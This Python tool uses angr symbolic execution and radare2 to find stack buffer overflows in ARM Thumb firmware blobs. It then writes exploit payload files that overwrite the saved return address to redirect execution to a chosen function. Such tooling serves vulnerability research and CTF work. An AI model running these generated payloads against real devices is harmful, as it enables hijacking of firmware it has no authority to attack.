# m0-angr.py 10.8 KB
from utils import *
import restore

import angr
import claripy
import logging
import z3
import struct
import sys
import click

# Output files, opened relative to the current working directory.
API_PATH = 'api.txt'    # "<offset-hex>\t<name>" per restored function
CFG_PATH = 'cfg.txt'    # radare2 `pdf @@fcn` dump of every function
VULN_PATH = 'vuln.txt'  # appended "<type>\t<addr-hex>\t<payload>" per finding

# Step budgets of the two symbolic-execution phases:
#   FIND_CANDIDATE     - max simgr.step() calls while searching for candidates
#   VALIDATE_CANDIDATE - explore(n=...) budget used to validate one candidate
HEURISTICS_FIND_CANDIDATE = 1_000
HEURISTICS_VALIDATE_CANDIDATE = 100_000

# Layout used when loading/simulating the firmware.
GLOBAL_TABLE = dict(
    ep_offset=0x00000004,     # file offset of the 32-bit word holding the entry point
    global_start=0x20000000,
    global_size=0x00001000,
    stack_top=0x20002000,     # initial sp; stack is [stack_top - stack_size, stack_top)
    stack_size=0x00001000,
    dma_start=0x50000000,     # reads in [dma_start, dma_start + dma_size) return fresh symbols
    dma_size=0x00001000,
)

class M0Analyzer:
    """Search an ARM thumb firmware blob (presumably Cortex-M0) for stack overflows.

    The binary is loaded into angr as a raw ``blob`` at base address 0.
    Functions restored by ``restore.RestoreAPI`` are replaced by
    ``SimProcedure`` hooks; ``on_read`` APIs return fresh 8-bit symbols that
    are recorded per path in ``state.globals['on_read_history']``.  A write
    into the 4-byte slot just below the current frame's stack pointer
    (treated as the saved lr) is reported to ``VULN_PATH`` together with the
    concrete bytes read so far.  ``generate_payload`` turns such a record into
    a binary input file.
    """

    def __init__(self, binPath):
        """Load *binPath* and build its angr project and CFG."""
        self.binPath = binPath
        self.bin = loadBinary(binPath)
        # Configure the angr logger *before* the first project/CFG build so
        # that build is silenced too.
        angr_logger = logging.getLogger('angr')
        angr_logger.propagate = False
        angr_logger.setLevel('CRITICAL')
        self.__loadAngrAndCfg()

    def analyze(self, limit1=HEURISTICS_FIND_CANDIDATE, limit2=HEURISTICS_VALIDATE_CANDIDATE):
        """Hook APIs, dump the CFG and API list, then hunt for overflows.

        Args:
            limit1: max number of ``simgr.step()`` calls while searching for
                candidate states.
            limit2: ``explore(n=...)`` budget used to validate each candidate.
        """
        self.limit1 = limit1
        self.limit2 = limit2
        # Rebuild a fresh project (the constructor already built one) so hooks
        # installed by an earlier analyze() call do not carry over.
        self.__loadAngrAndCfg()
        self.__loadAPI()
        self.__extractCfg()
        self.__extractAPIList()
        self.__analyze()

    def read32(self, o):
        """Return the little-endian unsigned 32-bit word at file offset *o*."""
        return struct.unpack('<L', self.bin[o:o + 4])[0]

    def get_entry_offset(self):
        """Return the entry-point offset with the thumb bit cleared."""
        return self.read32(GLOBAL_TABLE['ep_offset']) & (~1)

    def generate_payload(self, out_path, code_offset, destination_offset, return_offset):
        """Write an input file exploiting the overflow recorded at *code_offset*.

        The ``VULN_PATH`` entry whose address equals *code_offset* supplies a
        comma-separated list of hex bytes.  Its ``[offset]`` placeholder becomes
        the thumb address of *destination_offset* just past its first push.
        Zero padding covers the registers pushed by that function's prologue,
        and *return_offset* is appended as the thumb return address.

        Returns:
            True if a matching entry was found and *out_path* was written;
            False if no entry matches (no file is written in that case).
        """
        payload = self.__find_vuln_payload(code_offset)
        if payload is None:
            return False

        out = bytearray()
        for token in payload.split(','):
            if not token:
                # Older writers emitted a leading empty field for empty payloads.
                continue
            if token == '[offset]':
                # +2 skips the 16-bit push, +1 sets the thumb bit.
                out += self.__u32(destination_offset + 2 + 1)
            else:
                out.append(int(token, 16))

        opcode, operand = getInst(self.p.factory.block(destination_offset + 1))
        assert opcode.find('push') != -1  # only support calling a function with prologue
        # One 4-byte slot per pushed register except the last one
        # (presumably lr, which receives return_offset below).
        lr_offset = (len(operand.split(',')) - 1) * 4
        out += bytes(lr_offset)
        out += self.__u32(return_offset + 1)

        # Write only once the whole payload is built, so a failed assertion
        # above never leaves a truncated file behind.
        with open(out_path, 'wb') as f:
            f.write(out)
        return True

    def __find_vuln_payload(self, code_offset):
        """Return the payload field of the first VULN_PATH line at *code_offset*, else None."""
        with open(VULN_PATH, 'rt') as f:
            for line in f:
                tokens = line.strip('\r\n ').split('\t')
                if len(tokens) != 3:
                    continue
                _kind, offset, payload = tokens
                if int(offset, 16) == code_offset:
                    return payload
        return None

    @staticmethod
    def __u32(v):
        """Encode *v* as 4 little-endian bytes, truncated to 32 bits."""
        return struct.pack('<I', v & 0xffffffff)

    def __loadAngrAndCfg(self):
        """(Re)create ``self.p`` (angr project) and ``self.cfg`` (normalized CFGFast)."""
        ep = self.get_entry_offset()
        main_opts = {'backend': 'blob', 'arch': 'arm', 'base_addr': 0, 'entry_point': ep + 1}
        self.p = p = angr.Project(self.binPath, main_opts=main_opts, use_sim_procedures=True)
        self.cfg = cfg = p.analyses.CFGFast(force_complete_scan=False, function_starts=[ep + 1])
        cfg.normalize()

    def __loadAPI(self):
        """Restore API names/types into ``self.l`` and hook each API in the project.

        Raises:
            ValueError: if a restored entry has an unsupported ``type``.
        """
        self.l = l = restore.RestoreAPI(self.binPath, self.cfg.functions.keys()).restore()
        p = self.p

        class HookReturn(angr.SimProcedure):
            def run(self, return_value=None):
                if return_value is None:
                    return
                if return_value == 'no_return':
                    ret = None
                elif return_value == 'return_sym':
                    ret = claripy.BVS('sym', 4 * 8)
                elif return_value == 'return_zero':
                    ret = 0x0
                elif return_value == 'return_one':
                    ret = 0x1
                elif return_value == 'on_read':
                    ret = claripy.BVS('read', 1 * 8)
                    # angr copies state.globals shallowly when a state forks,
                    # so appending in place would share one list between all
                    # paths.  Rebind a new list to keep the history per path.
                    history = self.state.globals['on_read_history']
                    self.state.globals['on_read_history'] = history + [{
                        'addr': self.state.addr,
                        'bvs': ret,
                    }]
                return ret

        valid_kinds = ('no_return', 'return_sym', 'return_zero', 'return_one', 'on_read')
        for offset, info in l.items():
            kind = info['type']
            if kind not in valid_kinds:
                raise ValueError(f'Invalid type: {kind}')
            # note that angr uses odd offsets in thumb-mode.
            p.hook(offset + 1, HookReturn(return_value=kind))
        print('[+] loaded APIs')
        self.__findMain()

    def __findMain(self):
        """Set ``self.main_offset`` to the first function that calls ``init``.

        The caller is also registered in ``self.l`` under the name ``main``.
        """
        import json  # not imported at module level in this file

        # where is our init function?
        init_offset = next((off for off, v in self.l.items() if v['name'] == 'init'), None)
        assert init_offset is not None  # assume that init func has been found

        # find its caller via radare2's call graph of the function at init_offset
        r = getRadareHandlerByOffsetList(self.binPath, self.cfg.functions.keys())
        r.cmd('s %d' % init_offset)
        caller_map = json.loads(r.cmd('agCj'))
        init_name = 'fcn.%08x' % init_offset
        caller_offset = None
        for v in caller_map:
            if init_name in v.get('imports', ()):
                caller_offset = int(v['name'].split('.')[1], 16)
                break  # stop at the first caller (a nested break used to keep the last one)
        assert caller_offset is not None
        self.main_offset = caller_offset
        self.l[caller_offset] = {'name': 'main'}

    def __extractCfg(self):
        """Rename every known function in radare2 and dump all of them to CFG_PATH."""
        r = getRadareHandlerByOffsetList(self.binPath, self.cfg.functions.keys())
        for offset, info in self.l.items():
            r.cmd('s %d' % offset)
            r.cmd('afn %s' % info['name'])
        r.cmd('pdf @@fcn > %s' % CFG_PATH)
        print('[+] extracted cfg')

    def __extractAPIList(self):
        """Write ``<offset-hex>\\t<name>`` for every known function, sorted by offset."""
        with open(API_PATH, 'wt') as f:
            for offset, info in sorted(self.l.items()):
                f.write('%08x\t%s\n' % (offset, info['name']))
        print('[+] extracted api list')

    def __analyze(self):
        """Phase 1: DFS from the entry point and validate each new candidate.

        A state is a candidate once it has an ``on_read`` entry whose ``addr``
        has not been seen before.  Each candidate is validated immediately.

        Returns:
            dict mapping that ``addr`` to ``{'state', 'target_offset', 'return_offset'}``.
        """
        print('[*] find candidates')
        sim = self.p.factory.simgr(self.__generate_state(offset=self.get_entry_offset()))
        sim.use_technique(angr.exploration_techniques.DFS())
        candidates = {}
        step_count = 0
        while sim.active:
            sim.step()
            for state in sim.active:
                history = state.globals['on_read_history']
                if not history:
                    continue
                addr_ = history[-1]['addr']
                if addr_ in candidates:
                    continue
                print('[*] found a candidate')
                candidate = {
                    'state': state.copy(),
                    'target_offset': state.callstack.func_addr,
                    'return_offset': state.callstack.ret_addr,
                }
                candidates[addr_] = candidate
                self.__test_candidate(candidate)
            step_count += 1
            if step_count >= self.limit1:
                break
        print('[+] analyzed all')
        return candidates

    def __test_candidate(self, candidate):
        """Phase 2: explore from a candidate state (budget ``limit2``).

        States whose current function is main are avoided.  Findings are
        reported by the mem_write breakpoint installed in ``__generate_state``.
        """
        sim = self.p.factory.simgr(candidate['state'])
        sim.use_technique(angr.exploration_techniques.DFS())
        sim.explore(n=self.limit2, avoid=lambda s: (s.callstack.func_addr & (~1)) == self.main_offset)

    def __generate_state(self, offset):
        """Build the initial state at thumb address *offset*+1 with BOF/MMIO breakpoints."""
        state = self.p.factory.entry_state(addr=offset + 1)
        state.regs.r13 = state.callstack.stack_ptr = GLOBAL_TABLE['stack_top']
        # These two dicts are mutated in place, so (globals being copied
        # shallowly) they are shared by all states forked from this one.
        # has_appeared therefore dedupes reports across paths.
        state.globals['start_ptr_map'] = {}
        state.globals['has_appeared'] = {}
        # Rebound (never mutated) by the on_read hook, so it stays per path.
        state.globals['on_read_history'] = []

        # Half-open address ranges [lo, hi).
        stack_lo = GLOBAL_TABLE['stack_top'] - GLOBAL_TABLE['stack_size']
        stack_hi = GLOBAL_TABLE['stack_top']
        dma_lo = GLOBAL_TABLE['dma_start']
        dma_hi = dma_lo + GLOBAL_TABLE['dma_size']

        def cb_before_write(state):  # detect BOF
            if not state.inspect.instruction:
                return
            dest = state.solver.eval(state.inspect.mem_write_address)
            pc = state.solver.eval(state.regs.pc)
            if not (stack_lo <= dest < stack_hi):
                return
            opcode, operand = getInst(self.p.factory.block(pc))
            # push/sub are the frame's own setup, not an overflow.
            for key in ('push', 'sub'):
                if opcode.find(key) != -1:
                    return
            if state.callstack.stack_ptr == -1:
                lr_ptr = GLOBAL_TABLE['stack_top'] - 4
            else:
                lr_ptr = state.callstack.stack_ptr - 4
            start_ptr_map = state.globals['start_ptr_map']
            if pc not in start_ptr_map:
                start_ptr_map[pc] = dest
            if not (lr_ptr <= dest < lr_ptr + 4):
                return
            seen = state.globals['has_appeared']
            if state.addr in seen:
                return
            seen[state.addr] = True
            history = state.globals['on_read_history']
            payload = [state.solver.eval(v['bvs']) for v in history[:-1]]  # except the last element
            self.__write_vuln_info({
                'type': 'bof',
                'addr': state.addr,
                'payload': payload,
            })

        def cb_before_read(state):  # simulate memory-mapped io
            if not state.inspect.instruction:
                return
            dest = state.solver.eval(state.inspect.mem_read_address)
            if dma_lo <= dest < dma_hi:
                state.memory.store(dest, claripy.BVS(str(dest), 4 * 8))  # at most 32bits

        state.inspect.b('mem_write', when=angr.BP_BEFORE, action=cb_before_write)
        state.inspect.b('mem_read', when=angr.BP_BEFORE, action=cb_before_read)
        return state

    def __write_vuln_info(self, info):
        """Append ``<type>\\t<addr-hex>\\t<bytes...>,[offset]`` to VULN_PATH and echo it."""
        kind = info['type']
        addr = '%08x' % (info['addr'] & (~1))
        # Join the placeholder as its own token so an empty payload does not
        # produce a leading empty field that generate_payload cannot parse.
        tokens = ['%02x' % v for v in info['payload']]
        tokens.append('[offset]')
        payload = ','.join(tokens)
        s = f'{kind}\t{addr}\t{payload}\n'
        with open(VULN_PATH, 'a') as f:
            f.write(s)
        print('[*] found a vuln:', s)

@click.command()
@click.option('--type',   required=True, type=click.Choice(['a', 'g']),
              help="'a': analyze the binary, 'g': generate a payload file")
@click.option('--name',   required=True, help='path of the firmware binary')
@click.option('--limit1', required=False, type=int, default=HEURISTICS_FIND_CANDIDATE)
@click.option('--limit2', required=False, type=int, default=HEURISTICS_VALIDATE_CANDIDATE)
@click.option('--out',    required=False, default='')
@click.option('--code',   required=False, default='')
@click.option('--dest',   required=False, default='')
@click.option('--ret',    required=False, default='0')
def main(type, name, limit1, limit2, out, code, dest, ret):
    """Analyze a firmware binary (--type a) or generate an overflow payload (--type g).

    Generate mode needs --code (hex address of a recorded finding), --dest
    (hex address of the function to jump to), --out (payload file to write)
    and optionally --ret (hex address to return to afterwards, default 0).
    """
    def parse_hex(option, value):
        try:
            return int(value, 16)
        except ValueError:
            raise click.BadParameter(f'{value!r} is not a hexadecimal number',
                                     param_hint=option) from None

    if type == 'g':
        # Validate generate-mode arguments before building the analyzer:
        # constructing the angr project and CFG can be slow.
        missing = [opt for opt, val in (('--out', out), ('--code', code), ('--dest', dest))
                   if not val]
        if missing:
            raise click.UsageError('generate mode (--type g) requires ' + ', '.join(missing))
        code_offset = parse_hex('--code', code)
        dest_offset = parse_hex('--dest', dest)
        ret_offset = parse_hex('--ret', ret)

    analyzer = M0Analyzer(name)
    if type == 'a':  # analyze
        analyzer.analyze(limit1, limit2)
    else:  # generate
        if not analyzer.generate_payload(out, code_offset, dest_offset, ret_offset):
            print('[-] no recorded vulnerability at offset %s' % code)
            sys.exit(1)
    print('[+] done')
    sys.exit(0)


if __name__ == "__main__":
    main()